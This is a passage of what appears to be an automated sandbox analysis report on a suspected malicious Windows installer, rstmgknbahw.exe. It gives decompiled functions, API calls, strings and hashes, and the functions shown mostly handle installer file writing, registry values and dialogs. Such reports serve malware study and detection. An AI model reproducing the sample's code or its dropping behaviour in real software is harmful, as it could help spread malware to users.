lstrcatA.KERNEL32(xzfdi,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(xzfdi,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

xzfdi, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$xzfdi
API String ID: 900638850-1289049640
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

*?|<>/":, xrefs: 00405D2B
"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 00405CE9
C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1551715608
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

verifying installer: %d%%, xrefs: 00402B71
p>u, xrefs: 00402B63
unpacking data: %d%%, xrefs: 00402B6A, 00402B7A

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: p>u$unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-4167347466
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0xb600
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

APIs

GlobalAlloc.KERNEL32(00000040,0000B600,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32 ref: 00404EB7
SendMessageA.USER32 ref: 00404ED1
SendMessageA.USER32 ref: 00404EDF

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

APIs

SendMessageA.USER32 ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32 ref: 00404741
SendMessageA.USER32 ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp
API String ID: 1356686001-2133834865
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00403897 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x753e70
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "heifsmlbdxlebvytfzg Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x1
						_t27 =  *0x423ec8; // 0x75401c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x754034
								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

APIs

SetWindowTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup), ref: 0040392F

Strings

1033, xrefs: 0040389B, 004038A5, 00403916
heifsmlbdxlebvytfzg Setup, xrefs: 0040391E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403898
p>u, xrefs: 004038B5

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\$heifsmlbdxlebvytfzg Setup$p>u
API String ID: 530164218-2496455689
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

